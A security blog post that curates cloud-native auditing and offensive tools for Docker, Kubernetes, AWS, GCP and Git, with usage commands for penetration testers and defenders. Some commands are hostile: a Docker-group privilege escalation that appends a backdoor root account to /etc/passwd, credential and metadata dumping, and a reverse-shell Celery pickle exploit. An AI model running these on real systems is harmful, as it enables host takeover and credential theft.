| Follow @lancinimarco | Subscribe to CloudSecList

Reading time ~10 minutes

My Arsenal of Cloud Native (Security) Tools

A while ago I posted “So I Heard You Want to Learn Kubernetes” (part of the “Kubernetes Primer for Security Professionals” series), where I tried to demystify the perception by which Kubernetes is believed to be too hard to even get started, by walking through the journey I undertook to get the basics first, and to focus on its security aspects later.

The natural evolution was to put into practice those concepts, but I quickly realized there was a shortage of resources that gave a comprehensive overview of (offensive) security tooling for that space. As with many topics in this industry, information is often scattered and non-uniform.

@ToniBlyx, in his post “My arsenal of AWS security tools”, gave it a go. That post was indeed the starting point for this one, but I felt the need to personalize that list and to add tools not only for AWS, but also for Docker, Kubernetes, and even Git.

In this post I’ll focus on providing a curated list of tools I personally find useful, alongside a quick “usage” guide for each one of them. I’ve also released an Ansible role for those who want to quickly deploy them.

An Ansible role for (some of) the tools listed in this article can be found on Github: https://github.com/marco-lancini/utils/tree/main/ansible/roles/kali-cloud.

This post has been updated on multiple occasions:
  • 20 December 2018: added a new auditing tool for Kubernetes (KubiScan).
  • 24 January 2019 && 4 March 2019: added tools for Google Cloud Platform (GCP).
  • 2 May 2019: added one new auditing tool for Docker (dive), and two for Kubernetes (kubeaudit, kubesec).

Docker

Auditing Tools

Name Description
Docker Bench Checks for common best-practices around deploying Docker containers in production. Based on the CIS Docker Community Edition Benchmark v1.1.0. 
docker run -it --net host --pid host --userns host \
    --cap-add audit_control                        \
    -e DOCKER_CONTENT_TRUST=$DOCKER_CONTENT_TRUST  \
    -v /var/lib:/var/lib                           \
    -v /var/run/docker.sock:/var/run/docker.sock   \
    -v /usr/lib/systemd:/usr/lib/systemd           \
    -v /etc:/etc --label docker_bench_security     \
    docker/docker-bench-security
Clair Scan Docker images for security vulnerabilities (static analysis).
I personally found it not straightforward to setup, so I ended up creating my own docker-compose to spin up Clair, alongside Postgres and Klar.
Dockscan Scan Docker installations for security issues and vulnerabilities. 
# Scan local Docker installation
dockscan unix:///var/run/docker.sock
# Scan remote Docker installation and produce HTML report
dockscan -r html -o myreport -v tcp://example.com:5422
dive A tool for exploring each layer in a docker image. 
docker run --rm -it                              \
    -v /var/run/docker.sock:/var/run/docker.sock \
    wagoodman/dive:latest <args>

Privilege Escalation

Name Description
dockerrootplease Gives you root on the host OS, if you're a member of the "docker" group 
docker run -v /:/hostOS -i -t chrisfosterelli/rootplease
docker-rootshell Abuses membership in the "docker" group to drop a root shell in the current working directory.
docker-escalate Same concept as above.
Manual 
# Read file
docker run -v /etc/shadow:/docker/hashedpasswords -d postgres

# Manually privesc (if part of docker group)
# by adding a backdoor toor:password
docker run -it --rm -v $PWD:/mnt bash
$ echo 'toor:$1$.ZcF5ts0$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh'
    >> /mnt/etc/passwd


Kubernetes

Auditing Tools

Name Description
kube-bench Checks whether Kubernetes is deployed according to security best practices. Based on the CIS Kubernetes Benchmark. 
# Run inside a container
docker run --rm --pid=host                      \
   -v $(which kubectl):/usr/bin/kubectl         \
   -t aquasec/kube-bench:latest <master|node>

# Run in a cluster - on master node
kubectl run                                          \
    --rm                                             \
    -it                                              \
    kube-bench-master                                \
    --image=aquasec/kube-bench:latest                \
    --restart=Never                                  \
    --overrides="{ \"apiVersion\": \"v1\",           \
        \"spec\": { \"hostPID\": true,               \
        \"nodeSelector\":                            \
        { \"kubernetes.io/role\": \"master\" },      \
        \"tolerations\": [ {                         \
        \"key\": \"node-role.kubernetes.io/master\", \
        \"operator\": \"Exists\",                    \
        \"effect\": \"NoSchedule\" }]}}"             \
    -- master                                        \
    --version 1.8

# Run in a cluster - on worker nodes
kubectl run                                \
    --rm                                   \
    -it                                    \
    kube-bench-node                        \
    --image=aquasec/kube-bench:latest      \
    --restart=Never                        \
    --overrides="{ \"apiVersion\": \"v1\", \
        \"spec\": { \"hostPID\": true } }" \
    -- node                                \
    --version 1.8
kube-hunter Hunt for security weaknesses in Kubernetes clusters (even remote). 
# Run from docker
docker run -it --rm --network host aquasec/kube-hunter

# Run from kubectl
kubectl run --rm -it                        \
     kube-hunter                            \
     --image=aquasec/kube-hunter            \
     --restart=Never                        \
     --overrides="{ \"apiVersion\": \"v1\", \
     \"spec\": { \"hostNetwork\": true } }"
KubiScan Scan for risky permissions and users in Kubernetes Role-Based Access Control (RBAC) authorization model. It can detect accounts which will expose the whole cluster if their identification (JWT token, certificate, etc.) is compromised by an attacker. 
# Run from MASTER node
docker run -it --rm -e CONF_PATH=~/.kube/config -v /:/tmp cyberark/kubiscan [CMD]

# Search for pods with privileged accounts
kubiscan -rp

# Show all risky subjects (users, service accounts, groups)
kubiscan -rs

# Show all the rules a service account has
kubiscan -aars "SANAME" -ns "default" -k "ServiceAccount"

# List service account RoleBindings
kubiscan -aarbs "SANAME" -ns "default" -k "ServiceAccount"
kubeaudit Audit clusters against common security controls. 
# Run from kubectl (as plugin)
kubectl audit all
kubesec Quantify risk for Kubernetes resources. 
krew install kubesec-scan
kubectl kubesec-scan pod <podname>
kube-auto-analyzer Configuration analyzer to automate the process of reviewing Kubernetes installations against the CIS Kubernetes Benchmark. 
# Put the config file in a directory and mount it to the /data folder
docker run --rm                               \
    -v /data:/data raesene/kube_auto_analyzer \
    -c /data/admin.conf -r testdock

# Provide a KUBECONFIG file to identify and authenticate the session
kubeautoanalyzer -c <kubeconfig_file_name> -r <report_name> --html


AWS

Basic Tools

Name Description
aws-cli Universal Command Line Interface for AWS, used by basically any other tool. 
$ aws configure --profile <profile_name>
aws-shell Interactive shell for AWS (with autocompletion, etc.).

Inventory Tools

Name Description
aws-inventory Make an inventory of all your resources across regions. 
$ python aws_inventory.py
# Select the generated JSON file when prompted
$ firefox gui/dist/index.html
Resource Counter Counts number of resources in categories across regions. 
$ python count_resources.py
aws_public_ips Fetch all public IP addresses tied to your AWS account. 
# Uses default ~/.aws/credentials
$ aws_public_ips -f json -s apigateway,cloudfront,ec2, \
    elasticsearch,elb,elbv2,lightsail,rds,redshift
# With a custom profile
$ AWS_PROFILE=production aws_public_ips ...

Auditing Tools

Name Description
CS-Suite Auditing the security posture of AWS/GCP/Azure infrastructure. Includes Scout2, Prowler, AWS Trusted Advisor, etc.
Permissions required: SecurityAudit 
 $ python cs.py -env aws
CloudSploit Returns a series of potential misconfigurations and security risks.
Permissions required: SecurityAudit 
# Edit the index.js file with your AWS key and secret
# Run a standard scan
$ node index.js
# Run a compliance scan
$ node index.js --compliance=hipaa
AWS Security Benchmark Script to evaluate your AWS account against the full CIS Amazon Web Services Foundations Benchmark 1.1. 
$ python aws-cis-foundation-benchmark-checklist.py
S3Scan Generate a report of all S3 buckets and their permissions (authenticated). 
$ python s3scan.py [-f <format>] [-p <profile>]
CloudMapper Analyze AWS environments by creating network diagrams (and more).
Permissions required: ReadOnlyAccess, SecurityAudit 
# Configuration
# Edit it to include your account ID and name (ex. "prod"),
# along with any external CIDR names
$ cp config.json.demo config.json 

# Collect data & show network diagram
$ python cloudmapper.py collect --account my_account
$ python cloudmapper.py prepare --account my_account
$ python cloudmapper.py webserver

# Find public APIs/hosts/port ranges
$ python cloudmapper.py api_endpoints
$ python cloudmapper.py public

# Audit (check for potential misconfigurations)
$ python cloudmapper.py audit
$ python cloudmapper.py find_admins
PMapper Advanced and Automated AWS IAM Evaluation.
Permissions required: ReadOnlyAccess 
§ Usage
# Gather & visualize data
$ python pmapper.py --profile my_profile graph
$ python pmapper.py visualize

# Query if 1+ principals can do a given action with a given resource
# Supported queries:
#     "can <Principal> do <Action> [with <Resource>]"
#     "who can do <Action> [with <Resource>]"
#     "preset <preset_query_name> <preset_query_args>"
$ python pmapper.py --profile my_profile    \
    query  "who can do s3:GetObject with *"

# Presets
#      priv_esc = identifies all principals that can change
#                  their own permissions (admins) & any
#                  principals that can access the administrative
#                  principals
#      connected = identifies if one principal can access another,
#                  or list all principals that can be accessed
$ python pmapper.py --profile my_profile    \
    query "preset priv_esc user/PowerUser"
Scout2 Security auditing. Already included in CS-Suite.
Permissions required: ReadOnlyAccess, SecurityAudit 
$ Scout2 --profile <PROFILE_NAME>
Prowler CIS benchmarks and additional checks for security best practices in AWS. Already included in CS-Suite.
Permissions required: SecurityAudit 
$ ./prowler -p PROFILE -r us-east-1 | ansi2html -la > report.html

Offensive Tools

Name Description
Pacu AWS penetration testing toolkit, designed for offensive security testing against cloud environments. Current modules enable a range of attacks, including user privilege escalation, backdooring of IAM users, attacking vulnerable Lambda functions, etc. 
# Import keys
pacu> import_keys <profile>
# Modules
https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details
Nimbostratus Tools for fingerprinting and exploiting Amazon cloud infrastructures. 
# Dump credentials available in this host
$ nimbostratus dump-credentials

# Dump permissions for the provided credentials
$ nimbostratus dump-permissions                        \
    --access-key=<ACCESS-KEY>                          \
    --secret-key=<SECRET>

# Dump instance metadata for the instance where the command is run
$ nimbostratus dump-ec2-metadata

# Create DB snapshot                                   \
#    If you've got credentials which allow you to      \
#       access the RDS API but do not have any         \
#       access to the database itself (MySQL user)     \
#    This allows to access the information stored      \
#          in that database by creating                \
#          a snapshot and restoring it                 \
$ nimbostratus snapshot-rds --access-key=ACCESS        \
        --secret-key=SECRET                            \
        --password PASSWORD --rds-name NAME            \
        --region ap-southeast-1

# Inject raw Celery message
$ nimbostratus celery-pickle-exploit --access-key=ACCESS \
    --secret-key=SECRET                                  \
    --reverse 1.2.3.4:4000 --queue-name NAME

# Create new user
$ nimbostratus create-iam-user --access-key=ACCESS       \
        --secret-key=SECRET
weirdALL AWS Attack Library. 
# Set an AWS key pair
$ cat env.sample
        [default]
        aws_access_key_id = <insert key id>
        aws_secret_access_key = <insert secret key>
$ cp env.sample .env

# Setup the database
$ python3 create_dbs.py

# Run the recon module
$ python3 weirdAAL.py -m recon_all -t MyTarget

# Other modules
https://github.com/carnal0wnage/weirdAAL/wiki
S3Scanner Scan for open AWS S3 buckets and dump the contents. 
$ cat names.txt
    flaws.cloud
    google-dev
    testing.microsoft.com
    yelp-production.s3-us-west-1.amazonaws.com
    github-dev:us-east-1

# Dump all open buckets
$ python s3scanner.py --include-closed  \
    --out-file found.txt --dump names.txt

# Save file listings of all open buckets to file
$ python s3scanner.py --list names.txt
Cloudjack CloudJack assesses AWS accounts for subdomain hijacking vulnerabilities as a result of decoupled Route53 and CloudFront configurations. 
$ python cloudjack.py -o json -p default
AWS PWN A collection of AWS penetration testing scripts:
  • Reconnaissance
  • Exploration
  • Elevation
  • Persistence

Training Apps

Name Description
flAWS Challenge that, through a series of levels, teaches common mistakes and gotchas when using AWS. It also has some "public" credentials you can use to try your tools against: 
Access key ID: AKIAJFQ6E7BY57Q3OBGA
Secret: S2IpymMBlViDlqcAnFuZfkVjXrYxZYhP+dZ4ps+u
Cloudgoat Vulnerable by Design AWS infrastructure setup tool. There are also some writeups available.
DVCA Damn Vulnerable Cloud Application.
nimbostratus-target This repository holds a target infrastructure you can use for testing nimbostratus.


GCP

Basic Tools

Name Description
gcloud Command Line Interface for GCP. 
$ gcloud init
$ gcloud auth list
$ gcloud auth application-default login
$ export GOOGLE_APPLICATION_CREDENTIALS="PATH"

Auditing Tools

Name Description
G-Scout Auditing GCP configurations.
Permissions required on the projects: Viewer, Security Reviewer, Stackdriver Account Viewer 
$ python gscout.py --project-id <projectID>
ScoutSuite Multi-cloud security auditing tool.
Permissions required on the projects: Viewer, Security Reviewer, Stackdriver Account Viewer 
# Using an user account
$ python Scout.py --provider gcp --user-account --project-id <projectID>
# Using a service account
$ python Scout.py --provider gcp                                     \
                  --service-account --key-file service_account.json  \
                  --project-id <projectID>
gcp-audit Takes a set of projects and audits them for common issues as defined by its ruleset. 
$ python gcp-audit.py -p <projectID>
gcp-iam-collector Python script for collecting and visualising Google Cloud Platform IAM permissions. 
# Dump all IAM to csv files
$ python collector.py
# Create an interactive graph
$ python create_iam_graph.py
CS-Suite Auditing the security posture of AWS/GCP/Azure infrastructure.
Can be overlooked as it relies on G-Scout.
Permissions required on the projects: Viewer, Security Reviewer, Stackdriver Account Viewer 
$ python cs.py -env gcp -pId <project_name>

Offensive Tools

Name Description
GCPBucketBrute Enumerate Google Storage buckets, determine what access you have to them, and determine if they can be privilege escalated. 
$ python3 gcpbucketbrute.py -k <KEYWORD> \
                            -f <sa-priv-key.pem> -o ./out.txt


GIT

Name Description
git-secrets Prevents you from committing secrets and credentials into git repositories.
Gitrob Reconnaissance tool for GitHub organizations. 
$ export GITROB_ACCESS_TOKEN=<TOKEN>
$ gitrob <TARGET>
Gitleaks Searches full repo history for secrets and keys.
TruffleHog Searches through git repositories for high entropy strings and secrets.
CloudSecList

Subscribe to CloudSecList

If you found this article interesting, you can join thousands of security professionals getting curated security-related news focused on the cloud native landscape by subscribing to CloudSecList.com.

About the Author

Marco Lancini

Marco Lancini
Hi, I'm Marco Lancini. I am a Principal Security Engineer, advisor, investor, and writer mainly interested in cloud native technologies, security, and technical leadership...  [read more] 
Read More

Red Teaming Mind Map from The Hacker Playbook 3

Published on November 18, 2018

Hunt for and Exploit the libSSH Authentication Bypass (CVE-2018-10933)

Published on October 18, 2018

About

Hi, I'm Marco Lancini. I am a Principal Security Engineer, advisor, investor, and writer mainly interested in cloud native technologies, security, and technical leadership...  [read more] 

Buy me a coffeeBuy me a coffee

Sponsor

CloudSec* Projects

CloudSecBooks CloudSecDocs CloudSecList

Collections

Continuous Visibility into Ephemeral Cloud Environments
Cloud Security Strategies
The CloudSec Engineer - Previews
Kubernetes Primer for Security Professionals

Must Read

What to look for when reviewing a company's infrastructure
On Establishing a Cloud Security Program
Security Logging in Cloud Environments - GCP
Security Logging in Cloud Environments - AWS
Tracking Moving Clouds: How to continuously track cloud assets with Cartography
The Current State of Kubernetes Threat Modelling
Mapping Moving Clouds: How to stay on top of your ephemeral environments with Cartography
So I Heard You Want to Learn Kubernetes

Recent Articles

Serverless Emails with Cloudflare Email Routing
Cyber Security Career Pathways
Serverless Ad Blocking with Cloudflare Gateway
What to look for when reviewing a company's infrastructure
CVE-2022-0847 (aka Dirty Pipe): What does it mean for defenders

Tags

Twitter Feed